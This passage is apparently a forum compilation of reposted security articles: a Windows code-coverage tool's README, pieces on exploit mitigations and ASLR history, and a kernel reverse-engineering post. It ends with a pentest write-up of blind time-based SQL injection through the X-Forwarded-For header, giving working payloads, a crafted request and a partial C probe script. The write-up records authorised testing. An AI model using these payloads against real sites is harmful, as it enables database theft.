[ 0.720487] Applied 7557 breakpoints ( 1585310 total breakpoints) ntmarta.dll
[ 0.732045] Applied 28569 breakpoints ( 1613879 total breakpoints) iertutil.dll
```

# Usage

To use mesos there are 3 major steps. First, the modules of a running process are saved. Second, these modules are loaded in IDA, which then outputs a list of all basic blocks into the meso format. And finally, mesos is run against a target process to gather coverage!

## Creating meso_deps.zip

This step is the first thing we have to do. We create a ZIP file containing all of the modules loaded into a given PID. This script requires no internet and is designed to be easily dropped onto new VMs so mesos can be generated for your target application. It depends on PowerShell v5.0 or later, which is installed by default on Windows 10 and Windows Server 2016.
Run, with <pid> replaced with the process ID you want to gather coverage on:

```
C:\dev\mesos>powershell .\offline_meso.ps1 8484
Powershell is 64-bit: True
Target is 64-bit: True

C:\dev\mesos>
```

Optionally you can supply -OutputZip <zipfile> to change the output zip file name.

This will create a meso_deps.zip that, if you look inside it, contains all of the modules used in the process you ran the script against. Example output:

```
C:\dev\mesos>powershell .\offline_meso.ps1 8484 -OutputZip testing.zip
Powershell is 64-bit: True
Target is 64-bit: True

C:\dev\mesos>powershell Expand-Archive testing.zip -DestinationPath example

C:\dev\mesos>powershell Get-ChildItem example -rec -File -Name
cache\c_\program files\common files\microsoft shared\ink\tiptsf.dll
cache\c_\program files\intel\optaneshellextensions\iastorafsserviceapi.dll
cache\c_\program files\widcomm\bluetooth software\btmmhook.dll
cache\c_\program files (x86)\common files\adobe\coresyncextension\coresync_x64.dll
...
```

## Generating meso files

To generate meso files we operate on the meso_deps.zip we created in the last step. It doesn't matter where this zip came from. This allows the zip to have come from a VM that the PowerShell script was run on.

Basic usage is:

```
python generate_mesos.py process_ida
```

This will use the meso_deps.zip file as input, and use IDA to process all executables in the zip file and figure out where their basic blocks are. This will create a cache folder with a bunch of files in it. These files are named based on the module name, the module's TimeDateStamp in the PE header, and the ImageSize field in the PE header. This is what DLLs are uniqued by in the PDB symbol store, so it should be good enough for us here too.

You'll see there are files with no extension (these are the original binaries), files with .meso extensions (the breakpoint lists), and .i64 files (the cached IDA database for the original binary).

## Symbol resolution

There is no limitation on what can make these meso files. The quality of the symbol resolution depends on the tool you used to generate them and its ability to resolve symbols. For example, with IDA, if you have public/private symbols your _NT_SYMBOL_PATH should be configured correctly.

## More advanced usage

Check the program's usage output for the most recent options. There are _whitelist and _blacklist options that allow you to use a list of strings to filter the amount of mesos generated. This is helpful as coverage outside of your target module is probably not relevant and just introduces overhead and unnecessary processing.

```
C:\dev\mesos>python generate_mesos.py
Usage:
    generate_mesos.py process_ida
        Processes all files in the meso_deps.zip file
    generate_mesos.py process_ida_whitelist <str 1> <str 2> <str ...>
        Processes only files containing one of the strings provided
    generate_mesos.py process_ida_blacklist <str 1> <str 2> <str ...>
        Processes all files except for those containing one of the provided strings

Examples:
    python generate_mesos.py process_ida_whitelist system32
        Only processes files in `system32`
    python generate_mesos.py process_ida_blacklist ntdll.dll
        Processes all files except for `ntdll.dll`

Path requirements for process_ida_*: must have `idat64.exe` in your PATH
```

Example usage:

```
C:\dev\mesos>python generate_mesos.py process_ida_whitelist system32
Processing cache/c_/windows/system32/advapi32.dll
Processing cache/c_/windows/system32/bcryptprimitives.dll
Processing cache/c_/windows/system32/cfgmgr32.dll
...
Processing cache/c_/windows/system32/user32.dll
Processing cache/c_/windows/system32/uxtheme.dll
Processing cache/c_/windows/system32/win32u.dll
Processing cache/c_/windows/system32/windows.storage.dll
Processing cache/c_/windows/system32/wintypes.dll
```

# Meso usage

Now we're onto the actual debugger. We've created meso files to tell it where to put breakpoints in each module. First we need to build it with Rust!

```
cargo build --release
```

And then we can simply run it with a PID!

```
target\release\mesos.exe <pid>
```

## Command-line options

Currently there are few options to mesos; run mesos without arguments to get the most recent list.

```
C:\dev\mesos>target\release\mesos.exe
Usage: mesos.exe <pid> [--freq | --verbose | --print] <explicit meso file 1> <explicit meso file ...>
    --freq               - Treats all breakpoints as frequency breakpoints
    --verbose            - Enables verbose prints for debugging
    --print              - Prints breakpoint info on every single breakpoint
    [explicit meso file] - Load a specific meso file regardless of loaded modules

Standard usage: mesos.exe <pid>
```

## Example usage

```
C:\dev\mesos>target\release\mesos.exe 13828
mesos  is 64-bit: true
target is 64-bit: true
[ 0.004033] Applied 5629 breakpoints ( 5629 total breakpoints) notepad.exe
[ 0.029248] Applied 61334 breakpoints ( 66963 total breakpoints) ntdll.dll
[ 0.037032] Applied 25289 breakpoints ( 92252 total breakpoints) kernel32.dll
[ 0.062844] Applied 55611 breakpoints ( 147863 total breakpoints) kernelbase.dll
...
[ 0.739059] Applied 66650 breakpoints ( 1552551 total breakpoints) coreuicomponents.dll
[ 0.750266] Applied 25202 breakpoints ( 1577753 total breakpoints) coremessaging.dll
[ 0.754485] Applied 7557 breakpoints ( 1585310 total breakpoints) ntmarta.dll
[ 0.766119] Applied 28569 breakpoints ( 1613879 total breakpoints) iertutil.dll
...
[ 23.544097] Removed 5968 breakpoints in imm32.dll
[ 23.551529] Syncing code coverage database...
[ 23.675103] Sync complete (169694 total unique coverage entries)
Detached from process 13828
```

## Why not use cargo run?

When running under cargo run, the Ctrl+C handler does not work correctly and does not allow us to detach from the target program cleanly.

# Limitations

Since this relies on a tool (IDA) to identify blocks, if the tool incorrectly identifies a block it could result in us inserting a breakpoint over data. Further, it's possible to miss coverage if a block is not correctly found.

## Why doesn't it do more?

Well. It really just allows fast breakpoints. Feel free to rip it apart and add your own hooks to functions. It could easily be used to fuzz things.

## Why IDA?

I tried a bunch of tools and IDA was the only one that seemed to work well. Binja would probably also work well, but I don't have it installed and I'm not familiar with the API. I have a coworker who wrote a plugin for it and that'll probably get pull-requested in soon. The meso files are just simple files; anyone can generate them from any tool.

# Technical Details

## Minidump autogenned filenames

The generated minidump filenames are designed to give a high level of glance value at crashes. They include things like the exception type, faulting address, and a rough classification of the bug.
Currently, if it's an access violation, we apply the following classification:

- Determine the access type (read, write, execute)
  - For reads the filename contains: "read"
  - For writes the filename contains: "WRITE"
  - For execute the filename contains: "DEP"
- Determine if it's a non-canonical 64-bit address
  - For non-canonical addresses the filename contains: NONCANON
- Otherwise determine if it's a NULL dereference (within 32 KiB +- of NULL)
  - Will put "null" in the filename
- Otherwise it's considered a non-null deref and "HIGH" appears in the filename

It's intended that more severe things are in all caps, to give higher glance value when prioritizing which crash dumps to look into. Example minidump filename for chrome:

```
crash_c0000005_chrome_child.dll+0x2c915c0_WRITE_null.dmp
```

## Meso file format

Coming soon (once it's stable)

Sursa: https://github.com/gamozolabs/mesos
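The core trick mesos relies on - one-shot int3 breakpoints whose cost is paid only on the first hit - can be sketched with the Win32 debug API (mesos itself is written in Rust; this C fragment is only the idea, for an x64 target, with the surrounding WaitForDebugEvent loop omitted):

```c
/* One-shot coverage breakpoints: write 0xCC over each basic-block start;
 * on the first hit, record coverage, restore the byte, rewind RIP, and
 * never trap on that block again. */
#include <windows.h>
#include <stdio.h>

void set_breakpoint(HANDLE proc, LPVOID addr, BYTE *saved) {
    BYTE cc = 0xCC;
    ReadProcessMemory(proc, addr, saved, 1, NULL);   /* remember original byte */
    WriteProcessMemory(proc, addr, &cc, 1, NULL);
    FlushInstructionCache(proc, addr, 1);
}

/* Called from the debug loop on EXCEPTION_BREAKPOINT at `addr`. */
void handle_hit(HANDLE proc, HANDLE thread, LPVOID addr, BYTE saved) {
    printf("coverage: %p\n", addr);                  /* block hit exactly once */

    WriteProcessMemory(proc, addr, &saved, 1, NULL); /* remove the breakpoint */
    FlushInstructionCache(proc, addr, 1);

    CONTEXT ctx;
    ctx.ContextFlags = CONTEXT_CONTROL;
    GetThreadContext(thread, &ctx);
    ctx.Rip -= 1;                                    /* re-run the original byte */
    SetThreadContext(thread, &ctx);
}
```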
8. Benno Rice — https://2019.linux.conf.au/schedule/p...

systemd is, to put it mildly, controversial. As a FreeBSD developer I decided I wanted to know why. I delved into the history of bootstrap systems, and even the history of UNIX and other contemporary operating systems, to try and work out why something like systemd was seen as necessary, if not desirable. I also tried to work out why so many people found it so upsetting, annoying, or otherwise rage-inducing. Join me on a journey through the bootstrap process, the history of init, the reasons why change can be scary, and the discovery of a part of your OS you may not even know existed.

linux.conf.au is a conference about the Linux operating system, and all aspects of the thriving ecosystem of Free and Open Source Software that has grown up around it. Run since 1999, in a different Australian or New Zealand city each year, by a team of local volunteers, LCA invites more than 500 people to learn from the people who shape the future of Open Source. For more information on the conference see https://linux.conf.au/
9. Microsoft: Improved security features are delaying hackers from attacking Windows users

If a vulnerability is exploited, it is most likely going to be exploited as a zero-day, or as an old security bug for which users and companies have had enough time to patch.

By Catalin Cimpanu for Zero Day | February 10, 2019 -- 18:37 GMT | Topic: Security

Constant security improvements to Microsoft products are finally starting to pay dividends, a Microsoft security engineer revealed last week. Speaking at the BlueHat security conference in Israel, Microsoft security engineer Matt Miller said that widespread mass exploitation of security flaws against Microsoft users is now uncommon -- the exception to the rule, rather than the norm.

Miller credited the company's efforts in improving its products with the addition of security-centric features such as an on-by-default firewall, Protected View in Office products, DEP (Data Execution Prevention), ASLR (Address Space Layout Randomization), CFG (Control Flow Guard), app sandboxing, and more.

These new features have made it much harder for mundane cybercrime operations to come up with zero-days or reliable exploits for newly patched Microsoft bugs, reducing the number of vulnerabilities exploited at scale. Mass, non-discriminatory exploitation does eventually occur, but usually long after Microsoft has delivered a fix, and after companies have had enough time to test and deploy patches.

Miller said that when vulnerabilities are exploited, they are usually part of targeted attacks, rather than cybercrime-related mass exploitation. For example, in 2018, 90 percent of all zero-days affecting Microsoft products were exploited as part of targeted attacks. These are zero-days found and used by nation-state cyber-espionage groups against strategic targets, rather than vulnerabilities discovered by spam groups or exploit kit operators.

The other 10 percent of zero-day exploitation attempts weren't cyber-criminals trying to make money, but people playing with non-weaponized proof-of-concept code, trying to understand what a yet-to-be-patched vulnerability does.

"It is now uncommon to see a non-zero-day exploit released within 30 days of a patch being available," Miller added. Exploits for both zero-day and non-zero-day vulnerabilities usually pop up much later, because it's getting trickier and trickier to develop weaponized exploits, thanks to all the additional security features that Microsoft has added to Windows and other products.

Two charts in Miller's presentation perfectly illustrate this new state of affairs. The chart on the left shows how Microsoft's efforts at patching security flaws have intensified in recent years, with more and more security bugs receiving fixes (and a CVE identifier). The chart on the right shows that, despite the rising number of known flaws in Microsoft products, fewer and fewer of these vulnerabilities are entering the arsenal of hacking groups and seeing real-world exploitation within the 30 days after a patch. (Charts: Matt Miller)

This shows that Microsoft's security defenses are doing their job by putting additional hurdles in the path of cybercrime groups. If a vulnerability is exploited, it is most likely going to be exploited as a zero-day by some nation-state threat actor, or as an old security bug for which users and companies have had enough time to patch.
Sursa: https://www.zdnet.com/article/microsoft-improved-security-features-are-delaying-hackers-from-attacking-windows-users/
10. John Lambert (@JohnLaTwC)

Story time. This one is about a feature in Windows called ASLR.

It was 2005. We were working on Windows Vista. Most remember it as the release with the maligned User Account Control feature. For us in Trustworthy Computing it was the first full Windows cycle where we could apply all the security engineering tools we had from start to finish. Efforts such as fuzzing file parsers, scrubbing the code of 'banned APIs' across millions of lines of code, fixing masses of potential bugs from static analysis, and driving initiatives to deal with newly discovered 'diseases' like mismatched container COM instantiation.

We hired the most spectacular group of researchers I've seen assembled, from NGS, iSEC Partners, IOActive, and n.runs, gave them source code and access to Windows engineers, and told them to hack without boundaries. My words to them in an early meeting were "you are here to blow sh*t up".

A quieter effort was going on to shore up our memory safety mitigations. Mitigations touch the holiest of holies in the OS: the compiler, the memory manager, the loader. Areas you just don't mess with late in an OS release. The breathing room created by the hardware Data Execution Prevention we added in XP SP2 was gone. Exploits were using return-to-libc attacks and taking advantage of the fact that much of the memory layout in a Windows process was predictable.

This was a feature. A lot of work went into carefully laying out memory so commonly loaded DLLs would never 'collide' and require the OS to relocate them at load time. The performance saving across every boot, every process load, on every PC was massive. And we needed to undo that work to build a new defense: Address Space Layout Randomization, or ASLR. ASLR would scramble the location of loaded modules and other process structures. However, it was late in the release, crazy late, to contemplate a change of this magnitude.

We had a few things in our favor. The feature was championed by @MattT_Cyber. Sometimes things happen because the right person says they need to happen. This was one of those features and Matt was one of those people. Our Exec VP, Jim Allchin, wanted it. Ever since Blaster, he had pushed the team to contemplate big security "sledgehammers" instead of just fighting bugs in "hand to hand combat". Host firewall on by default in XP SP2, hardware DEP support, and now ASLR.

Brian Valentine, who oversaw Windows development, recalled a @bluehat talk by @hdmoore where he showed these tables that Metasploit had for identifying code gadgets in consistent locations across OS versions and service packs. "Will this break that?" It would, and that was enough for him.

Sponsorship was there, but could we pull it off? A crucial moment arrived when the developer responsible for the memory manager, Landy Wang, finished up his backlog of work and got a free moment to consider it. It was a complex change - would it have the desired payoff? He turned to a trusted engineer, Neill Clift, and privately asked if it was worth doing. Neill gave it a nod. I remember Landy doing an initial prototype over a weekend. Suddenly we were in the game.

A boatload of work remained to make it truly viable, with contributions across the company:
- Architecture and development: LandyW, ArunKi, RichardS, BryanT
- Security analysis: NeillC, NiGoel, MichalCh, SergFo
- AppCompat analysis: RobKenny, RPaige, TBaxter

Needless to say, it happened. We pondered how to announce it.
Since ASLR was a feature that security researchers would notice, we decided to introduce it at a researcher conference. The year before, I had attended Ph Neutral, put on by the legendary Phenoelit group in Germany. @window took me around and introduced me to people at the con. Sometimes people are right where they need to be. Microsoft needed @window, and she brought down walls between Microsoft and the researcher community. This conference was the right spot. I flew to Berlin.

In 2006 Microsoft was very controversial in security circles. Showing up as the representative of the "evil empire" in a den of security researchers dedicated to finding our flaws and revealing them to a seemingly clueless corporate behemoth was enough to give anyone pause.

I entered the room to give my presentation. The room filled up. Completely up. People were sitting on the floor, standing along the walls, hovering in the doorway. There was an electricity in the air: the room was finally going to hear from a Microsoft insider about our efforts. Would people be hostile? Interrupt and challenge me? There were plenty of reasons for the crowd to be cynical. I had no idea how this was going to go. I had prepared a very technical presentation, because that's how I thought best to respect the audience.

FX (@41414141) came up to the front and introduced me. Then he did something I'll never forget. Seemingly on the spur of the moment, he didn't join the audience and instead sat next to me by the podium. It was a small thing in some ways, but it meant the world to me. His presence next to me seemed to suggest to the room: "he is a guest here and we will treat him with respect". To feel like an outsider and have the ultimate insider in his forum make sure you will be treated right is one of the kindest gestures I've ever received.

I completed my presentation and found the subsequent hallway conversations thrilling. I later delivered the same brief at Blackhat (blackhat.com/presentations/…).

As time went on, the value of ASLR diminished, but I remember most the human moments that brought together an unlikely cast working on the messy hairball of security, enduring headwinds and advancing forward.

Sursa: https://threadreaderapp.com/thread/1093956949073289216.html
11. Yes, More Callbacks — The Kernel Extension Mechanism

Yarden Shafir, Jan 1

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash. As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don't take it well when this assumption breaks. j00ru documented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called "windows kernel host extensions" mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this: [call-stack screenshot in the original post]

From this crash dump, we can see that Bam.sys registered a process-creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process-creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run, for example, "!wdbgark.wa_systemcb /type process" in WinDbg, we'll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks. If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to a variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called "extension table" using this "extension host" and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallback and search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension. As suspected, bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually stored in a function table named bam!BampKernelCalloutTable, which is later passed, together with some other parameters (we'll talk about them in a minute), to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints about what this function is responsible for, or what this "extension" is, and couldn't find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.
Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

NTKERNELAPI
NTSTATUS
ExRegisterExtension (
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo
);

typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured out that the formal input parameter "PVOID RegistrationInfo" is actually of type PEX_EXTENSION_REGISTRATION_1. The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

- nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
- Then, the function verifies that the number of functions supplied in RegistrationInfo->FunctionCount matches the expected number set in the host's structure. It also makes sure that the host's FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
- If everything seems OK, the host's FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we'll discuss it soon.
- Eventually, the fully initialized host is returned to the caller via an output parameter.

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is: where do these hosts come from? During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:

nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY (unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRY structure is undocumented, and looks something like this:

struct _HOST_LIST_ENTRY {
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;     // number of callbacks that the extension contains
    POOL_TYPE PoolType;       // where this host is allocated
    PVOID HostInterface;      // table of unexported nt functions, to be used by
                              // the driver to which this extension belongs
    PVOID FunctionAddress;    // optional, rarely used. This callback is called
                              // before and after an extension for this host is
                              // registered / unregistered
    PVOID ArgForFunction;     // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;      // a table of the callbacks that the driver "registers"
    DWORD Flags;              // Only uses one bit. Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;

When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS on certain occasions, which makes them some kind of callbacks.
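To make the driver's side of this registration concrete, here is a minimal, hypothetical sketch in C, based only on the ntosifs.h prototype and structure shown above. ExRegisterExtension is undocumented, the extension ID/version values are placeholders (the real ones must match whatever host NTOS created), and the callback names and signatures are invented for illustration - treat this as a sketch, not a supported API:

// Illustrative sketch only: registering a kernel extension the way a
// predetermined driver (like Bam.sys) appears to. Not a supported API.
#include <ntddk.h>

typedef struct _EX_EXTENSION *PEX_EXTENSION;   // opaque handle

typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID   *FunctionTable;
    PVOID  *HostInterface;
    PVOID  DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

NTKERNELAPI NTSTATUS ExRegisterExtension(
    PEX_EXTENSION *Extension,
    ULONG RegistrationVersion,
    PVOID RegistrationInfo);

// Placeholder callbacks: the real signatures are whatever NTOS expects at
// each index (e.g. index 0 is invoked by nt!PspCallProcessNotifyRoutines).
VOID MyCreateProcessCallback(VOID)    { }
VOID MySetThrottleStateCallback(VOID) { }
VOID MyGetThrottleStateCallback(VOID) { }
VOID MySetUserSettings(VOID)          { }
VOID MyGetUserSettingsHandle(VOID)    { }

// Order matters: the host calls these by index, like Bam's callout table.
static PVOID g_CalloutTable[5] = {
    (PVOID)MyCreateProcessCallback,
    (PVOID)MySetThrottleStateCallback,
    (PVOID)MyGetThrottleStateCallback,
    (PVOID)MySetUserSettings,
    (PVOID)MyGetUserSettingsHandle,
};

static PVOID g_HostInterface;   // receives the host's table of unexported nt functions
static PEX_EXTENSION g_Extension;

NTSTATUS RegisterMyExtension(PDRIVER_OBJECT DriverObject)
{
    EX_EXTENSION_REGISTRATION_1 reg = { 0 };

    reg.ExtensionId      = 1;               // placeholder: must match an existing host
    reg.ExtensionVersion = 1;               // placeholder
    reg.FunctionCount    = 5;               // must match the host's expected count
    reg.FunctionTable    = g_CalloutTable;
    reg.HostInterface    = &g_HostInterface; // filled in during registration
    reg.DriverObject     = DriverObject;

    return ExRegisterExtension(&g_Extension, 1, &reg);
}

If the ID/version pair does not match a host on nt!ExpHostList, or the host's FunctionTable is already set, the call fails - which is exactly the "cannot register twice" check described above.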
Earlier we saw that part of nt!ExRegisterExtension's functionality is to set RegistrationInfo->HostInterface (which points to a global variable in the calling driver) to point to some data found in the host structure. Let's get back to that. Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don't receive one at all. For example, this is the HostInterface that Bam.sys receives:

So the "kernel extensions" mechanism is actually a bi-directional communication port: the driver supplies a list of "callbacks", to be called on different occasions, and receives a set of functions for its own internal use. To stick with the example of Bam.sys, let's take a look at the callbacks that it supplies:

- BampCreateProcessCallback
- BampSetThrottleStateCallback
- BampGetThrottleStateCallback
- BampSetUserSettings
- BampGetUserSettingsHandle

The host initialized for Bam.sys "knows" in advance that it should receive a table of 5 functions. These functions must be laid out in the exact order presented here, since they are called according to their index. As we can see in this case, where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called:

To conclude, there exists a mechanism to "extend" NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers. I don't know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I'd love to know :)

Appendix A — Extension hosts initialized by NTOS:

Appendix B — functions pseudo-code:

Appendix C — structures definitions:

struct _HOST_INFORMATION {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;
} HOST_INFORMATION, *PHOST_INFORMATION;

struct _HOST_LIST_ENTRY {
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;     // number of callbacks that the extension contains
    POOL_TYPE PoolType;       // where this host is allocated
    PVOID HostInterface;      // table of unexported nt functions, to be used by
                              // the driver to which this extension belongs
    PVOID FunctionAddress;    // optional, rarely used. This callback is called
                              // before and after an extension for this host is
                              // registered / unregistered
    PVOID ArgForFunction;     // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;      // a table of the callbacks that the driver "registers"
    DWORD Flags;              // Only uses one flag. Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;

struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

Yarden Shafir
Security researcher

Sursa: https://medium.com/yarden-shafir/yes-more-callbacks-the-kernel-extension-mechanism-c7300119a37a
12. X Forwarded for SQL injection

06.Feb.2019
Nikos Danopoulos, Ghost Labs

Ghost Labs
Ghost Labs performs hundreds of security tests for its customers, ranging from global enterprises to SMEs. Our team consists of highly skilled ethical hackers, covering a wide range of advanced testing services to help companies keep up with evolving threats and new technologies.

Last year, in May, I was assigned a web application test for a regular customer. As the test was a blackbox one, one of the few entry points - if not the only one - was a login page. The tight scoping range and the static nature of the application did not provide many options. After spending some time on the enumeration phase - trying to find hidden files/directories, credentials leaked online, common credentials, vulnerable application components and more - I was driven to a dead end. No useful information was found, the enumeration phase had finished, and no progress had been made. Moreover, fuzzing attempts on the login parameters did not trigger any interesting responses.

Identifying the entry point

A very useful Burp Suite extension is Bypass WAF. To find out how this extension works, have a quick look here. Briefly, this extension is used to bypass a Web Application Firewall by inserting specific headers in our HTTP requests. X-Forwarded-For is one of them. What this header is also known for, though, is its frequent use by developers to store the IP address of the client. The following backend SQL statement is a vulnerable example of this:

mysql_query("SELECT username, password FROM users-data WHERE username='".sanitize($_POST['username'])."' AND password='".md5($_POST['password'])."' AND ip_adr='".ipadr()."'");

More info here: SQL Injection through HTTP Headers

Here ipadr() is a function that reads the $_SERVER['HTTP_X_FORWARDED_FOR'] value (the X-Forwarded-For header) and, by applying some regular expression, decides whether to store the value or not. The web application I was testing turned out to have a similar vulnerability: the provided X-Forwarded-For header was not properly validated, it was parsed as part of a SQL statement - and there was the entry point. Moreover, it was not mandatory to send a POST request to the login page to inject the payload through the header. The header was read and evaluated on the index page, by just requesting the "/" directory.

Due to the application's structure, I was not able to trigger any visible responses from the payloads. That made the injection a blind, time-based one. Out of several, more complex payloads - used mainly for debugging purposes - the final initial payload was:

"XOR(if(now()=sysdate(),sleep(6),0))OR"

And it was triggered by a similar request:

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: "XOR(if(now()=sysdate(),sleep(6),0))OR"
X-Requested-With: XMLHttpRequest
Referer: http://internal.customer.info/
Host: internal.customer.info
Connection: close
Accept-Encoding: gzip,deflate
Accept: */*

The response was delayed; the sleep value was then incremented to validate the finding and, indeed, the injection point was confirmed. As sqlmap couldn't properly insert the injection point inside the XOR payload, an initial manual enumeration was done. The next piece of information to extract was the database name length, which would later allow me to identify the database name too.
Here is the payload used:

"XOR(if(length(database())<='30',sleep(5),null))OR"

Of course, Burp Intruder was used to gradually increment the database length value. It turned out that the database length is 30. To find the database name, Burp Intruder was used again with the following payload:

"XOR(if(MID(database(),1,1)='§position§',sleep(9),0))OR"

To automate this in an attack, the following payload was used:

"XOR(if(MID(database(),1,§number§)='§character§',sleep(2),0))OR"

During the attack I noticed that the first 3 characters were the same as the first 3 characters of the domain name I was testing. The domain was 20 characters long. I paused the Intruder attack, went back to Repeater and verified like this:

"XOR(if(MID(database(),1,20)='<domain-name>',sleep(4),0))OR"

Indeed, the server delayed its response, indicating that the first 20 characters of the database name are the same as the domain name. The database name was 30 characters long, so I had to continue the attack, this time with a different payload starting from character 21, in order to find the full database name. After a few minutes, the full database name was extracted.

Format: "<domain-name>_<subdomain-name>_493"

With the database name I then attempted to enumerate table names. Similarly, a char-by-char bruteforce attack is required to find the valid names. To do this I used the information_schema.tables table, which provides information about all the databases' tables, and filtered only the current database's tables by using the WHERE clause:

"XOR(if(Ascii(substring(( Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))= '100', sleep(5),0))OR"*/

As the previous payload was the initial one, I simplified it to this:

"XOR(if((substring(( Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))='a', sleep(3),0)) OR "*/

Again, the payload was passed to Burp Intruder to automate the process. After a few minutes the first tables were discovered. After enumerating about 20 table names I decided to try my luck with sqlmap again. As several tables were discovered, one of them was used to help sqlmap understand the injection point and continue the attack. Payload used in sqlmap:

XOR(select 1 from cache where 1=1 and 1=1*)OR

By that time I had managed to properly set the injection point, and I forced sqlmap to just extract the column names and data from the interesting tables.

Notes and Conclusion

At the end of the injection, the whole database along with the valuable column information was retrieved. The customer was notified immediately and the attack was reproduced as a proof of concept. Sometimes manual exploitation - especially with blind, time-based attacks - may seem tedious. As shown, it is also sometimes difficult to automate a detected injection attack. The best thing that can be done in such cases is to attack manually until all the information missing for the automation of the attack is collected. (A minimal sketch of scripting this char-by-char approach appears after the article link below.)

Sursa: https://outpost24.com/blog/X-forwarded-for-SQL-injection
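As a closing illustration, here is a small, hypothetical sketch in C (using libcurl) of how the char-by-char, time-based extraction described above could be scripted instead of driven through Burp Intruder. The target URL, charset, payload shape and timing threshold are placeholders mirroring the article's payloads; a real script would also retry to smooth out network jitter:

/* Sketch: time-based blind SQLi probe via the X-Forwarded-For header.
 * Build: gcc probe.c -lcurl
 * Naive timing check: assumes baseline latency is well under the threshold. */
#include <stdio.h>
#include <curl/curl.h>

/* Discard the response body; we only care about timing. */
static size_t discard(char *p, size_t s, size_t n, void *u)
{ (void)p; (void)u; return s * n; }

/* Returns 1 if the request took longer than `threshold` seconds. */
static int probe(const char *payload, double threshold)
{
    CURL *curl = curl_easy_init();
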